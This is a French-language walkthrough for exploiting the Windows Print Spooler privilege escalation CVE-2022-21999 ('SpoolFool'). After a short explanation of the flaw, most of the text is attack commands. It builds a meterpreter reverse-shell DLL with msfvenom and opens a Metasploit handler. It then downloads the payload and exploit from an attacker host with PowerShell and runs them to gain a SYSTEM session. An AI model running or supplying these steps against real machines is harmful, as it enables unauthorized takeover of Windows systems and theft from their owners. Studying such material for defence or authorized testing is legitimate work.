Oliver Lyak a publié un article sur une vulnérabilité d'escalade de privilèges Windows qui persistait dans les systèmes Windows même après la correction des vulnérabilités précédentes dans Print Spooler CVE-2020-1048 et CVE-2020-1337. Oliver s'est vu attribuer la CVE-2022-21999 pour cette vulnérabilité et l'a communément appelée "SpoolFool".

La vulnérabilité permet à un utilisateur non privilégié de créer des répertoires arbitraires et inscriptibles en configurant l'attribut SpoolDirectory sur une imprimante. Puisqu'un utilisateur non privilégié est autorisé à ajouter des imprimantes distantes, un attaquant peut créer une imprimante distante et donner à TOUT LE MONDE le droit de gérer cette imprimante. Cela renverrait un descripteur avec le droit PRINTER_ACCESS_ADMINISTER qui peut ensuite être utilisé pour effectuer des tâches telles que l'injection de DLL.

Exploitation

# Téléchargement de l'exploit
git clone https: //github.com/ly4k/SpoolFool
cd SpoolFool

Dans un premier temps il nous faut créer un payload et ouvrir un multi handler sur notre machine.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST= <attacker IP> LPORT= <port d'écoute> > reverse. dll

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT <port d'écoute>
exploit

On va ensuite télécharger notre reverse shell et notre exploit sur la machine cible.

> powershell -c iwr http: //<attacker IP>/reverse.dll -outf \Users\Public\reverse.dll
> powershell -c iwr http: //<attacker IP>/SpoolFool.exe -outf \Users\Public\SpoolFool.exe

Nous pouvons maintenant exécuter l'exploit.

C:\users\public> SpoolFol.exe -dll reverse.dll

Si tout se passe bien, nous devrions avoir reçu une session meterpreter avec les droits NT AUTHORITY\SYSTEM sur notre multi handler.